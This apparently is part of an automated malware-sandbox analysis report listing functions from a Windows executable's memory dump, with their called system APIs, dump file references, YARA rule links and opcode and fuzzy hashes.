Instruction Fuzzy Hash: 4AE0E240E0A18B45FD282AE618365B501B04F293B2E185B30DBFEC82D6EE1CA8928150

Function 00007FF6CCCBD90C Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMON

Download Yara Rule

APIs

RtlRestoreThreadPreferredUILanguages.NTDLL ref: 00007FF6CCCBD922
GetLastError.KERNEL32 ref: 00007FF6CCCBD934

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: ErrorLanguagesLastPreferredRestoreThread
String ID:
API String ID: 588628887-0
Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
Instruction ID: 907cdbe3c23eb5b776bff79797d9eb3bd6a61223c1760fe77d0e3e8ae4397730
Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
Instruction Fuzzy Hash: B7E0EC60E0958346FF18AFF2A8651B913B16F98B53F0444B4CB8DC725AEE3CE4868600

Function 00007FF6CCC833E4 Relevance: 1.8, APIs: 1, Instructions: 328COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8388C

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: de6ed7916833eab16265dc8adf0133c5cc9bb4ef2c6b2401519f57c94907b3cc
Instruction ID: 3436469d24a3375c60689ecfa9fbf0b1dad07facda3f8e0854301cd7df7fd54c
Opcode Fuzzy Hash: de6ed7916833eab16265dc8adf0133c5cc9bb4ef2c6b2401519f57c94907b3cc
Instruction Fuzzy Hash: DAD1A362B086C256EF688F25D6446BA67B1FB45B96F081037CBAD877A5CF3CE4618700

Function 00007FF6CCC95294 Relevance: 1.7, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC9551B

Part of subcall function 00007FF6CCCA13F4: CompareStringW.KERNEL32 ref: 00007FF6CCCA145A

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: CompareString_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1017591355-0
Opcode ID: 60054bf23714923d6cf658706c57d8570bb270d346a0b8b9a17da1f048c8cd6a
Instruction ID: 7ae45352e9fbd8b8c555a364621d439e92801254c0fc3819932550bdbd02dde9
Opcode Fuzzy Hash: 60054bf23714923d6cf658706c57d8570bb270d346a0b8b9a17da1f048c8cd6a
Instruction Fuzzy Hash: BB61CF51E0C6CB81FAA49F65D41427A62B1AF85BDBF144231EFCDC6EC6EE7CE4819201

Function 00007FF6CCCA1870 Relevance: 1.7, APIs: 1, Instructions: 172COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CCC9E948: ReleaseSemaphore.KERNEL32 ref: 00007FF6CCC9E974
Part of subcall function 00007FF6CCC9E948: FindCloseChangeNotification.KERNELBASE ref: 00007FF6CCC9E993
Part of subcall function 00007FF6CCC9E948: DeleteCriticalSection.KERNEL32 ref: 00007FF6CCC9E9AA
Part of subcall function 00007FF6CCC9E948: CloseHandle.KERNEL32 ref: 00007FF6CCC9E9B7

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCA1ACB

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1624603282-0
Opcode ID: 7dd4c45c898d1fc3c125baa466fe89dc4e149350440c7c1a3107608e29ab7dcf
Instruction ID: 9f0353d4776983543ec7b58814a6a4247385111606fb01dc4abcf95bbb73a07a
Opcode Fuzzy Hash: 7dd4c45c898d1fc3c125baa466fe89dc4e149350440c7c1a3107608e29ab7dcf
Instruction Fuzzy Hash: B8619F62B15AC5A2EE08DFA5D5581BCB379FB80F95B544632D7AD87AC1CF28E4A08300

Function 00007FF6CCC8EC9C Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8EEB8

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 2f83e6df9ab7224275e60499f17cd5cc3bb417b2ed89fe698c193226d29eb46c
Instruction ID: 6ff1d2c0d11ae136aa12abe44d23c2a9329187636a937b1e692b2a5911698757
Opcode Fuzzy Hash: 2f83e6df9ab7224275e60499f17cd5cc3bb417b2ed89fe698c193226d29eb46c
Instruction Fuzzy Hash: 5E51D362A08AC251EB109F2594457AA2771FB85BC6F480137EFDD8B792CF3DE485C310

Function 00007FF6CCC8E7A8 Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CCC93EC8: FindClose.KERNELBASE(?,?,00000000,00007FF6CCCA0811), ref: 00007FF6CCC93EFD

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8E993

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: CloseFind_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1011579015-0
Opcode ID: 7ccb79097edba5c9ff264a6ea3acda2e11d4279ec26602cbe1bb149cda34522a
Instruction ID: 19d27e57b3904326d94b463c9fcb8394c047e7c767a175dc75a32df0c862eed2
Opcode Fuzzy Hash: 7ccb79097edba5c9ff264a6ea3acda2e11d4279ec26602cbe1bb149cda34522a
Instruction Fuzzy Hash: A4517F26A18AC681FB60DF28D4457AE2371FF84B8AF44013AEBCD8B6A5DF2CD441C351

Function 00007FF6CCC91794 Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC9187D

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: c006a20c94347bfb99d4e52a49aa348bdad6c5331fec93181297fc91a88f23fb
Instruction ID: 3a49963ee987454a31de9228f1df6db7c9034abfe1065d7a9fee2119254b2f28
Opcode Fuzzy Hash: c006a20c94347bfb99d4e52a49aa348bdad6c5331fec93181297fc91a88f23fb
Instruction Fuzzy Hash: 4341E662B18AC142EA148F16AA413BAA361FB44FD5F448536EF8C87F4ADF3CD5918300

Function 00007FF6CCC92F58 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC930C8

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 79c0921cd87fe934e762e48f5845e8be846b4b6500caa7e1addc831544741880
Instruction ID: 3f845b1b23e4273002cd4379307492898f06383c9886e53c36ac65908c4cf2fb
Opcode Fuzzy Hash: 79c0921cd87fe934e762e48f5845e8be846b4b6500caa7e1addc831544741880
Instruction Fuzzy Hash: 8241E362A08B8280EE149F29E54537A23B1EB85BDDF182235EBDD87799DF3DE4418700

Function 00007FF6CCCBBDF8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6CCCBBE20

Part of subcall function 00007FF6CCCBBFB0: GetModuleHandleExW.KERNEL32 ref: 00007FF6CCCBBFD0
Part of subcall function 00007FF6CCCBBFB0: GetProcAddress.KERNEL32 ref: 00007FF6CCCBBFE6
Part of subcall function 00007FF6CCCBBFB0: FreeLibrary.KERNEL32 ref: 00007FF6CCCBC00B

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
Instruction ID: f2b09c4b7324a599bd80c2d8d9b522ec4e13c2445ffd78f48c7e8f1667508e86
Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
Instruction Fuzzy Hash: 9141B422E186D382FB249F9598B15792371AF64B42F44443AEBCED76A1DF3DE841C780

Function 00007FF6CCC8129C Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CCC81396

Part of subcall function 00007FF6CCC81F80: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6CCC81F89

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
String ID:
API String ID: 680105476-0
Opcode ID: 9aea57e1cbc1acb0343bc23020ebe7367b53934ade50ddaffc586ce89fb7cfd6
Instruction ID: ae2f4121abb381ff95111c204c76083f75422c7f7a3efcecfbc3a0f10e2176c6
Opcode Fuzzy Hash: 9aea57e1cbc1acb0343bc23020ebe7367b53934ade50ddaffc586ce89fb7cfd6
Instruction Fuzzy Hash: 22216222A0879185EA149F92A40067A62B4FB05BF1F680B32DFBDC7BD1DE7CE4518344

Function 00007FF6CCCC124C Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CCCC1280

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
Instruction ID: 830814ddd11c44a6df607faeeab18ae2ed41b2a22867bfdf6098941983e91310
Opcode Fuzzy Hash: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
Instruction Fuzzy Hash: F411463AA1C6C286F610AF92A48167972B4FF41382F550539EBCEDB796DF3CE8108740

Function 00007FF6CCCAFC68 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CCCAF0A4: GetDlgItem.USER32 ref: 00007FF6CCCAF0E3
Part of subcall function 00007FF6CCCAF0A4: ShowWindow.USER32 ref: 00007FF6CCCAF109
Part of subcall function 00007FF6CCCAF0A4: IsDlgButtonChecked.USER32 ref: 00007FF6CCCAF11E
Part of subcall function 00007FF6CCCAF0A4: IsDlgButtonChecked.USER32 ref: 00007FF6CCCAF136
Part of subcall function 00007FF6CCCAF0A4: IsDlgButtonChecked.USER32 ref: 00007FF6CCCAF157
Part of subcall function 00007FF6CCCAF0A4: IsDlgButtonChecked.USER32 ref: 00007FF6CCCAF173
Part of subcall function 00007FF6CCCAF0A4: IsDlgButtonChecked.USER32 ref: 00007FF6CCCAF1B6
Part of subcall function 00007FF6CCCAF0A4: IsDlgButtonChecked.USER32 ref: 00007FF6CCCAF1D4
Part of subcall function 00007FF6CCCAF0A4: IsDlgButtonChecked.USER32 ref: 00007FF6CCCAF1E8
Part of subcall function 00007FF6CCCAF0A4: IsDlgButtonChecked.USER32 ref: 00007FF6CCCAF212
Part of subcall function 00007FF6CCCAF0A4: IsDlgButtonChecked.USER32 ref: 00007FF6CCCAF22A

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAFD03

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: ButtonChecked$ItemShowWindow_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 4003826521-0
Opcode ID: 547a288419434c71f498dd61c948c2c3518c924996789682ab92213e3808854e
Instruction ID: b2f16a0663b939b4367f2b3b00bb902eb026c4daa00d8e3d3084064e1ecc6427
Opcode Fuzzy Hash: 547a288419434c71f498dd61c948c2c3518c924996789682ab92213e3808854e
Instruction Fuzzy Hash: F701C462E286C542E9209F65D45A37E6331EFD9795F501332EBEC86BD6DE2CE1408604

Function 00007FF6CCC83AD8 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC83B6C

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 454a1fcff6e1850c8b97cdd7684a735fd34d2cefc8bc4c1965818da2daadb151
Instruction ID: 7d87ad1a6949b68adcb217038633b3bfac955b22b46098e7ad0255503778f217
Opcode Fuzzy Hash: 454a1fcff6e1850c8b97cdd7684a735fd34d2cefc8bc4c1965818da2daadb151
Instruction Fuzzy Hash: 3401C4A2E18BC541EA119F68E44523A7371FF89B92F406232EBEC47BA5DF2CD0408704

Function 00007FF6CCCB1558 Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CCCB1604: GetModuleHandleW.KERNEL32(?,?,?,00007FF6CCCB1573,?,?,?,00007FF6CCCB192A), ref: 00007FF6CCCB162B

DloadProtectSection.DELAYIMP ref: 00007FF6CCCB15C9

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: DloadHandleModuleProtectSection
String ID:
API String ID: 2883838935-0
Opcode ID: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
Instruction ID: 3c8ef05033dc05168a03878b2f14087f90ecf4dd45fe9c38c7f6680151ff341b
Opcode Fuzzy Hash: 908f49ac33541a8240f4269ada82e733cc5c0c647bda27ab8868a2cee9a60ef3
Instruction Fuzzy Hash: BE11C060D096C781FB509F49A9D537023B0AF1534FF141039CBCEC62A1EE3CA899D640

Function 00007FF6CCCBFA04 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00007FF6CCCBFA59

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
Instruction ID: 98ef852c5440ed063ca5d92fc939d4af9b4f662ecf766036faf09bb8748c6315
Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
Instruction Fuzzy Hash: 7AF06D58B0928749FE58AEEA99313B952B09F59B82F085430CB8ECA3C1ED2CE6C14250

Function 00007FF6CCC93EC8 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CCC940BC: FindFirstFileW.KERNELBASE ref: 00007FF6CCC9410B
Part of subcall function 00007FF6CCC940BC: FindFirstFileW.KERNEL32 ref: 00007FF6CCC9415E
Part of subcall function 00007FF6CCC940BC: GetLastError.KERNEL32 ref: 00007FF6CCC941AF

FindClose.KERNELBASE(?,?,00000000,00007FF6CCCA0811), ref: 00007FF6CCC93EFD

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
Instruction ID: 5f6bd62ea0a0276dc89b67183482bcd4e66b646017266873bd210e20e6d4e7ed
Opcode Fuzzy Hash: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
Instruction Fuzzy Hash: 9BF0AF629082C185EA10AF75A1002793770AB1ABB9F1C1379EBBE472C7CE28D4868745

Function 00007FF6CCC81FA0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC81FFB

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 0fb954f495e7f9b02f6a3e94d6a46f68925db21b8932cab22a75c4798dbb9f44
Instruction ID: 0f0ae37ef7de2cdd67c1ec1bc5907ec3b0fb583ad82df600ac653a92c3591212
Opcode Fuzzy Hash: 0fb954f495e7f9b02f6a3e94d6a46f68925db21b8932cab22a75c4798dbb9f44
Instruction Fuzzy Hash: 5CF05EB1B106C980EE189F69D08876D23B2EB44B8AF544432DB8CCBA55DF6DD491C345

Function 00007FF6CCC920D0 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF6CCC9207E), ref: 00007FF6CCC920F6

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
